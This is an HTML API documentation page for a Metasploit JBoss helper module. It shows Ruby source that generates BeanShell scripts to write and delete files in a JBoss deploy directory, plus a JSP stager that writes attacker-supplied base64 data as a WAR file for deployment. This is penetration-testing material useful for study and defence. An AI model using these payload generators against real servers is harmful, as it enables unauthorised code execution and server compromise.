adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/HTTP/JBoss/BeanShellScripts.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

735 lines
23 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HTTP::JBoss::BeanShellScripts
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HTTP::JBoss::BeanShellScripts";
relpath = '../../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../_index.html">Index (B)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../HTTP.html" title="Msf::Exploit::Remote::HTTP (module)">HTTP</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../JBoss.html" title="Msf::Exploit::Remote::HTTP::JBoss (module)">JBoss</a></span></span>
&raquo;
<span class="title">BeanShellScripts</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HTTP::JBoss::BeanShellScripts
</h1>
<div class="box_info">
<dl>
<dt>Included in:</dt>
<dd><span class='object_link'><a href="../JBoss.html" title="Msf::Exploit::Remote::HTTP::JBoss (module)">Msf::Exploit::Remote::HTTP::JBoss</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb</dd>
</dl>
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#create_file_bsh-instance_method" title="#create_file_bsh (instance method)">#<strong>create_file_bsh</strong>(opts = {}) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Generate a Bean Shell script which creates files inside the JBOSSs deploy directory.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#delete_files_bsh-instance_method" title="#delete_files_bsh (instance method)">#<strong>delete_files_bsh</strong>(opts = {}) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Generate a Bean Shell script to delete files from the JBosss /deploy directory.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#generate_bsh-instance_method" title="#generate_bsh (instance method)">#<strong>generate_bsh</strong>(type, opts = {}) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Generates a Bean Shell Script.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#stager_jsp-instance_method" title="#stager_jsp (instance method)">#<strong>stager_jsp</strong>(app_base) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Generate a stager JSP to write a WAR file to the deploy/ directory.</p>
</div></span>
</li>
</ul>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="create_file_bsh-instance_method">
#<strong>create_file_bsh</strong>(opts = {}) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Generate a Bean Shell script which creates files inside the JBOSSs deploy</p>
<pre class="code ruby"><code class="ruby">directory.
</code></pre>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>opts</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>Hash containing the options to create the Bean Shell Script.</p>
</div>
</li>
</ul>
<p class="tag_title">Options Hash (<tt>opts</tt>):</p>
<ul class="option">
<li>
<span class="name">:dir</span>
<span class="type">(<tt>Symbol</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>The dir where place the file.</p>
</div>
</li>
<li>
<span class="name">:file</span>
<span class="type">(<tt>Symbol</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>The file path.</p>
</div>
</li>
<li>
<span class="name">:contents</span>
<span class="type">(<tt>Symbol</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>The file contents.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>A Bean Shell script to create the file.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_create_file_bsh'>create_file_bsh</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_dir'>dir</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:dir</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_file'>file</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:file</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_contents'>contents</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:contents</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_payload_bsh_script'>payload_bsh_script</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;-EOT</span>
<span class='tstring_content'>import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;
String val = &quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_contents'>contents</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;
BASE64Decoder decoder = new BASE64Decoder();
String jboss_home = System.getProperty(&quot;jboss.server.home.dir&quot;);
new File(jboss_home + &quot;/deploy/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dir'>dir</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;).mkdir();
byte[] byteval = decoder.decodeBuffer(val);
String location = jboss_home + &quot;/deploy/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_file'>file</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;
FileOutputStream fstream = new FileOutputStream(location);
fstream.write(byteval);
fstream.close();
</span><span class='heredoc_end'> EOT
</span>
<span class='id identifier rubyid_payload_bsh_script'>payload_bsh_script</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="delete_files_bsh-instance_method">
#<strong>delete_files_bsh</strong>(opts = {}) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Generate a Bean Shell script to delete files from the JBosss /deploy</p>
<pre class="code ruby"><code class="ruby">directory.
</code></pre>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>opts</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>Hash containing the files to delete, the values are the files paths.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>A Bean Shell script to delete files.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
97
98
99
100
101
102
103
104</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 97</span>
<span class='kw'>def</span> <span class='id identifier rubyid_delete_files_bsh'>delete_files_bsh</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_script'>script</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>String jboss_home = System.getProperty(\&quot;jboss.server.home.dir\&quot;);\n</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_opts'>opts</span><span class='period'>.</span><span class='id identifier rubyid_values'>values</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_v'>v</span><span class='op'>|</span>
<span class='id identifier rubyid_script'>script</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>new File(jboss_home + \&quot;/deploy/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_v'>v</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot;).delete();\n</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_script'>script</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="generate_bsh-instance_method">
#<strong>generate_bsh</strong>(type, opts = {}) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Generates a Bean Shell Script.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>type</span>
<span class='type'>(<tt>Symbol</tt>)</span>
&mdash;
<div class='inline'>
<p>The Bean Shell script type, ':create` or `:delete`.</p>
</div>
</li>
<li>
<span class='name'>opts</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>Hash of configuration options.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>A Bean Shell script.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
10
11
12
13
14
15
16
17
18
19
20</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 10</span>
<span class='kw'>def</span> <span class='id identifier rubyid_generate_bsh'>generate_bsh</span><span class='lparen'>(</span><span class='id identifier rubyid_type'>type</span><span class='comma'>,</span> <span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_bean_shell'>bean_shell</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='kw'>case</span> <span class='id identifier rubyid_type'>type</span>
<span class='kw'>when</span> <span class='symbol'>:create</span>
<span class='id identifier rubyid_bean_shell'>bean_shell</span> <span class='op'>=</span> <span class='id identifier rubyid_create_file_bsh'>create_file_bsh</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='symbol'>:delete</span>
<span class='id identifier rubyid_bean_shell'>bean_shell</span> <span class='op'>=</span> <span class='id identifier rubyid_delete_files_bsh'>delete_files_bsh</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_bean_shell'>bean_shell</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="stager_jsp-instance_method">
#<strong>stager_jsp</strong>(app_base) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Generate a stager JSP to write a WAR file to the deploy/ directory. This is used to bypass the size limit for GET/HEAD requests.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>app_base</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The name of the WAR app to write.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The JSP stager.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 27</span>
<span class='kw'>def</span> <span class='id identifier rubyid_stager_jsp'>stager_jsp</span><span class='lparen'>(</span><span class='id identifier rubyid_app_base'>app_base</span><span class='rparen'>)</span>
<span class='id identifier rubyid_decoded_var'>decoded_var</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>+</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_file_path_var'>file_path_var</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>+</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_jboss_home_var'>jboss_home_var</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>+</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_fos_var'>fos_var</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>+</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_content_var'>content_var</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>+</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_stager_jsp'>stager_jsp</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;-EOT</span>
<span class='tstring_content'>&lt;%@page import=&quot;java.io.*,
java.util.*,
sun.misc.BASE64Decoder&quot;
%&gt;
&lt;%
String </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_jboss_home_var'>jboss_home_var</span><span class='embexpr_end'>}</span><span class='tstring_content'> = System.getProperty(&quot;jboss.server.home.dir&quot;);
String </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_file_path_var'>file_path_var</span><span class='embexpr_end'>}</span><span class='tstring_content'> = </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_jboss_home_var'>jboss_home_var</span><span class='embexpr_end'>}</span><span class='tstring_content'> + &quot;/deploy/&quot; + &quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_base'>app_base</span><span class='embexpr_end'>}</span><span class='tstring_content'>.war&quot;;
try {
String </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_content_var'>content_var</span><span class='embexpr_end'>}</span><span class='tstring_content'> = &quot;&quot;;
String parameterName = (String)(request.getParameterNames().nextElement());
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_content_var'>content_var</span><span class='embexpr_end'>}</span><span class='tstring_content'> = request.getParameter(parameterName);
FileOutputStream </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fos_var'>fos_var</span><span class='embexpr_end'>}</span><span class='tstring_content'> = new FileOutputStream(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_file_path_var'>file_path_var</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
byte[] </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_decoded_var'>decoded_var</span><span class='embexpr_end'>}</span><span class='tstring_content'> = new BASE64Decoder().decodeBuffer(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_content_var'>content_var</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fos_var'>fos_var</span><span class='embexpr_end'>}</span><span class='tstring_content'>.write(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_decoded_var'>decoded_var</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fos_var'>fos_var</span><span class='embexpr_end'>}</span><span class='tstring_content'>.close();
}
catch(Exception e){ }
%&gt;
</span><span class='heredoc_end'> EOT
</span>
<span class='id identifier rubyid_stager_jsp'>stager_jsp</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:46 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink